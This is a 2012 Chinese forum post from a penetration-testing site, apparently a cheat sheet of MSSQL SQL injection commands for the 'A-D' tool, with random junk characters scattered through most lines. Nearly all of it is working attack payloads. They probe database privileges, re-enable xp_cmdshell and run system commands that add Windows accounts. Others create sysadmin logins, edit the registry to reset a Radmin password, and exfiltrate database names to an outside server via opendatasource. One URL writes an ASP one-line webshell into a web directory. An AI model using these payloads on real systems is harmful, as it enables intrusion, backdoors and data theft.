中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令
2 Z/ ^( W  X5 T$ l% i% E//看看是什么权限的
+ z/ B" z7 i5 T4 D- |# m: Oand 1=(Select IS_MEMBER('db_owner'))
1 Z7 U! s. _# \$ k( bAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--/ T$ Z$ N$ q$ t4 B2 B# a
' u$ a2 Y9 ^6 a, d
//检测是否有读取某数据库的权限
7 I: ]2 s; O# Q3 s; l* zand 1= (Select HAS_DBACCESS('master'))! T3 r5 T4 w# T/ ^! o4 y
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --, Y- B; O, W4 H! @# p6 s, p% Z

* a# v; [4 l( V, U# J
& _$ X! Z: ]2 a8 h6 u/ l6 v: j9 i2 I数字类型! Y6 {0 _1 L2 h, F1 `' s
and char(124)%2Buser%2Bchar(124)=0
) s+ q' ~% Y! w9 J2 ~3 X, h/ {% e9 J* d8 V6 U
字符类型3 q. i2 ~: k: f, v
' and char(124)%2Buser%2Bchar(124)=0 and ''=') h. k  _4 T1 {
9 ?+ }4 A8 d5 p" w9 n3 k0 @' F& }" ]+ Y
搜索类型8 O% |: U8 H: z3 T, D
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
4 m0 s, V# w* h. a- ^( u# K- p5 L! p( g( o9 G6 W% V
爆用户名0 o! o' Y) o! i" |, _0 k  X
and user>0! \0 R2 a2 \2 w! L6 G
' and user>0 and ''='
- T. V5 K" S. s: F
0 O) ?7 Z# q; i检测是否为SA权限
, o+ ]* u9 }7 s9 c/ ^: r+ _and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
$ ^3 ^0 P: D2 w4 d. d" }And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" l5 g, ]# e0 q3 \; ^: M

$ G" B+ d7 q3 \4 B+ l1 Z9 _检测是不是MSSQL数据库
) z$ m2 V' g5 }3 J% V* v, Vand exists (select * from sysobjects);-- ; j9 Z1 S' W) R4 X
% A$ }: Y9 ^5 @  ?% E) q/ v
检测是否支持多行
: k! Z6 B8 f) v/ E6 a;declare @d int;--
; r0 V! B; L+ z, `' P+ [# @
  `  D* m+ L' l# @% l) h% I恢复 xp_cmdshell9 z8 @4 z& [% W" S% U) v0 v
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
0 l9 e6 z- ^3 a
; v8 L# b6 n% N. D0 y1 c2 u' I( r. f
: S3 T6 T. Q4 Q9 |, eselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') , P9 N6 T5 G+ s3 R# S
: f- V; J7 Q; v3 y
//-----------------------
2 Z. d+ J; [6 V: N/ P3 w5 r//      执行命令. M! F3 j7 N& N1 A5 V" `
//-----------------------$ f: z# a+ p5 E
首先开启沙盘模式:
/ `4 |2 c' i$ ?6 r7 ]) O) sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1' N3 a( V2 j8 T* \/ u
+ @0 l! ]$ G5 D; X
然后利用jet.oledb执行系统命令
# ?6 C1 h7 v0 G% {* f9 |7 uselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
! ~& p5 C4 y5 t5 S1 F* w, A/ o- F6 Q; y
执行命令
# \+ \" V) q! l7 Y6 K5 M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ G, F6 A% W3 b' ^0 ?* Z; ~  l7 }  p, K2 b. A& K. g
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'. j! w+ a0 f7 V0 ?% a; ^! s

$ L) o. n8 Z. D0 A! N判断xp_cmdshell扩展存储过程是否存在:/ Y" x& x8 T( m: j
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
+ t4 i0 N- r$ i# h5 [6 k) b* d& T" P6 ]8 I' q2 O2 j1 u
写注册表* A- O& j! F; }0 `. a9 t
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 W* v. V& W, p0 G) u6 F) L$ x
! R& H7 B8 h: T% Z8 X* M
REG_SZ
; |0 Z; i2 ~& Z& ^
) ?5 ]$ q8 u8 w8 E& L读注册表2 D- V! G( ?+ n
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
; S0 c2 E6 _; P" H  O- c3 l$ v
( `3 B- A# B- k# J读取目录内容4 I' [3 s8 ^1 C4 w1 Y
exec master..xp_dirtree 'c:\winnt\system32\',1,1, J/ \# l! \5 w& H' a0 ]
7 n% N" t8 S  G$ z1 \  ^4 {, K* U- P

$ _7 [0 N+ X  B" J3 {- {数据库备份; n/ y9 H. j$ B
backup database pubs to disk = 'c:\123.bak'
# ^6 P* @! p# s. v+ I* ^1 z1 c' U, \  e3 Q; [$ O! P  T
//爆出长度, P$ b2 z: o! B
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--1 c  ~1 G% U4 I  M9 ]9 a& \. j0 x" z
1 \% _  S. _6 l% d- Q; y0 u

, M0 i4 W* c, t4 i" {4 a
! [* q9 g- U8 n# n4 b3 [+ \更改sa口令方法:用sql综合利用工具连接后,执行命令:
& s9 j& Q0 ?' g5 W  gexec sp_password NULL,'新密码','sa'
1 w& h7 q, w, _* j$ a2 A. k; q% }, U* D
添加和删除一个SA权限的用户test:; d8 O3 x/ v: \0 h
exec master.dbo.sp_addlogin test,ptlove' C0 l) f2 d$ y4 Y8 C) W
exec master.dbo.sp_addsrvrolemember test,sysadmin' A3 Y/ _3 z6 o! A: {% h

& A+ b: B; J0 K+ w% L" G删除扩展存储过过程xp_cmdshell的语句: 9 t- O# {2 f: p& e
exec sp_dropextendedproc 'xp_cmdshell'
( p3 q; z$ c! u: E, L* W' x" \  S% n
3 f. W" k) w. m1 p3 x7 ^( T9 l9 t$ ^) D添加扩展存储过过程& g4 S6 p: J7 ~/ F0 s4 |  r4 A- n
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ' q5 L+ w: |) Z7 |8 _' ^
GRANT exec On xp_proxiedadata TO public
* V& L- z8 G( \: N3 {& Q/ y6 t  P" u9 T$ z  i/ J6 H
0 f. \! J7 N6 M
停掉或激活某个服务。
/ Z$ R0 \2 E5 |4 C! s8 ], W1 D! }+ F: v5 {: a; y3 o5 l2 Y
exec master..xp_servicecontrol 'stop','schedule'
. A2 @" F  a2 t. `exec master..xp_servicecontrol 'start','schedule'2 z# i, [! {2 E
. H' h, F( v0 O0 S- Z
dbo.xp_subdirs8 ]# @# S" U( C; s

0 e; [; f4 H0 Q: j+ k& P只列某个目录下的子目录。
) n) E, @7 g# B: a0 Xxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
& b; X1 u4 h. \4 E
2 [" w  K+ o( N' o0 D6 I6 Qdbo.xp_makecab
6 g2 Q: X1 V9 ]4 K$ u- b0 Q. s( r
4 f+ y4 c4 Y; O  T/ N3 r将目标多个档案压缩到某个目标档案之内。' L& G4 W; h3 F6 j  D, X
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。" w! x8 o3 E6 @- U3 ^8 \

2 ~! D: X! _1 D# S, L5 ?- bdbo.xp_makecab
! B, S: J: f. S- v- u; {'c:\test.cab','mszip',1,
/ {0 U7 B0 T  @* m+ s( I* s: }9 n'C:\Inetpub\wwwroot\SQLInject\login.asp'," U( n  L5 u# v7 ]3 J
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
4 y* K( ]6 b5 w. Q
  ~. ?8 A+ S, E1 p! {xp_terminate_process: v* e4 R( Y, B+ b
) r  p6 k: a3 p/ r
停掉某个执行中的程序,但赋予的参数是 Process ID。  l7 ]+ {" z$ ]3 J* N" H
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
. V. Y6 l  F; b' U" X2 d/ O5 X
& T$ z# O* g- \0 m6 gxp_terminate_process 2484- n3 g' W1 a0 e; T- m3 r% F- R; q, i
; f1 f) V7 I  _" K0 D
xp_unpackcab. ]% I1 p* ?4 g+ _
6 i0 H: L0 S4 Z" L% ?8 e3 p" I
解开压缩档。
, {+ V( x' v2 ]7 B' ~
- y0 T1 S- {4 d% Qxp_unpackcab 'c:\test.cab','c:\temp',1
& q% ?# `% F% ~7 \; W3 g) m
7 E  R3 Q% ~5 D. c/ C, C4 Z4 `8 E$ k5 |! s6 g8 Z( a
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; Y* |5 O/ {5 X6 ^
) V8 g  b3 ^& E+ k0 \create database lcx;* D+ c/ [; t$ n0 Y* W
Create TABLE ku(name nvarchar(256) null);
- F1 {7 W( t# Z" CCreate TABLE biao(id int NULL,name nvarchar(256) null);1 t5 }* y' h, F, K& z4 D8 z/ \

$ Q7 e5 H7 L5 W9 @1 A9 e//得到数据库名' X, W5 @( q) d' S* C7 o
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases+ {# {/ V( O+ z% X- j, x8 T
! S) b7 X4 l* l3 c. y% X
% {$ q3 ^+ ?( Z4 Q$ Y
//在Master中创建表,看看权限怎样
, H  T5 H/ \6 V8 k; b2 _Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--5 d) C4 T7 V+ ]* R
: x! j7 f1 D! c" m. Q
用 sp_makewebtask直接在web目录里写入一句话马:
4 J' x8 `+ i9 y3 y* ^3 U! [( Uhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
) S( n4 \& _' d. ?9 T* |4 `
4 x3 x& q* G. a( V" A  Z//更新表内容2 {7 `2 \$ Z! f
Update films SET kind = 'Dramatic' Where id = 123
/ D4 f& l6 K' Y5 |8 W  T- C! d8 G, {
//删除内容$ z1 r- K. b( P9 u* Y( D& I
delete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2